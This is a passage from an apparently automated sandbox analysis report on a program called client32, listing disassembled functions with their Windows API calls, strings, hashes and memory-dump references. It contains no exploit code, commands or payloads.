                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2256153495-0
                                                                                                                                                                                • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                                                                                • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                                                                                                                • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                                                                                • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                                                                                                                Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F1908,2520CF5D,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F1908,2520CF5D,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3991485460-0
                                                                                                                                                                                • Opcode ID: f8f15016e11f1f7ebefc5076f0316a4fd4f883f1168937dc7519782adb61c916
                                                                                                                                                                                • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                                                                                                                • Opcode Fuzzy Hash: f8f15016e11f1f7ebefc5076f0316a4fd4f883f1168937dc7519782adb61c916
                                                                                                                                                                                • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                                                                                                                Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: ??CTL32.DLL
                                                                                                                                                                                • API String ID: 1029625771-2984404022
                                                                                                                                                                                • Opcode ID: e6821840782cc3f73338b84f900344b5b51c25c68f39c308c51abe0b95882b8f
                                                                                                                                                                                • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                                                                                                                • Opcode Fuzzy Hash: e6821840782cc3f73338b84f900344b5b51c25c68f39c308c51abe0b95882b8f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                                                                                                                Function 6C605840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • inet_ntoa.WSOCK32(00000080,?,00000000,?,6C608F91,00000000,00000000,6C64B8DA,?,00000080), ref: 6C605852
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: inet_ntoa
                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                • API String ID: 1879540557-1553575800
                                                                                                                                                                                • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                                                • Instruction ID: 54c7959dd32f5dd421143f348e4e8883c5c2f69ff04b7618f638483572ee7533
                                                                                                                                                                                • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                                                • Instruction Fuzzy Hash: 031192217083E78BC31A8A2E98606D7BFD9EF87354B1C4559DCC5CB701D611D809C7D5
                                                                                                                                                                                Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DriveType
                                                                                                                                                                                • String ID: ?:\
                                                                                                                                                                                • API String ID: 338552980-2533537817
                                                                                                                                                                                • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                                                • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                                                                                                • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                                                                                                Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,?,?,?,110EDB88,?,?,00020019,2520CF5D), ref: 110ED4ED
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EDB88,?,?,00020019,2520CF5D), ref: 110ED53C
                                                                                                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,?,?), ref: 110ED2DB
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                                                                                                • API String ID: 1772833024-3994271378
                                                                                                                                                                                • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                                                • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                                                                                • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                                                • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                                                                                Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,?,?,?,110EDB88,?,?,00020019,2520CF5D), ref: 110ED4ED
                                                                                                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,?,?), ref: 110ED2DB
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Closewvsprintf
                                                                                                                                                                                • String ID: Error %d closing regkey %x
                                                                                                                                                                                • API String ID: 843752472-892920262
                                                                                                                                                                                • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                                                • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                                                • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                                                                                Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,Function_00026BE0,0262B7D0,?,?,?,00000100), ref: 11146FF9
                                                                                                                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 1114628A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                • String ID: NSMTRACE
                                                                                                                                                                                • API String ID: 4133054770-4175627554
                                                                                                                                                                                • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                                                                                • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                                                                                                                • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                                                                                                • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                                                                                                                Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 110262C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: psapi.dll
                                                                                                                                                                                • API String ID: 1029625771-80456845
                                                                                                                                                                                • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                                                                                • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                                                                                                                • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                                                                                                • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                                                                                                                Function 6C604F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,6C608DC8), ref: 6C604F78
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: psapi.dll
                                                                                                                                                                                • API String ID: 1029625771-80456845
                                                                                                                                                                                • Opcode ID: 475542d4469c2530913a0dc775654f5d86766923e1ed4a978a56c62be24f1a90
                                                                                                                                                                                • Instruction ID: 756f9b5e2b4d9534e362a158891a83ba6ae471ae02a17ca0ed37483f8bf9a5d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 475542d4469c2530913a0dc775654f5d86766923e1ed4a978a56c62be24f1a90
                                                                                                                                                                                • Instruction Fuzzy Hash: 07E001B1A01B208F83B0DF3AA544642BAF0BB18651311CE2E909EC3A00E330A5848F84
                                                                                                                                                                                Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101553E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: nslsp.dll
                                                                                                                                                                                • API String ID: 1029625771-3933918195
                                                                                                                                                                                • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
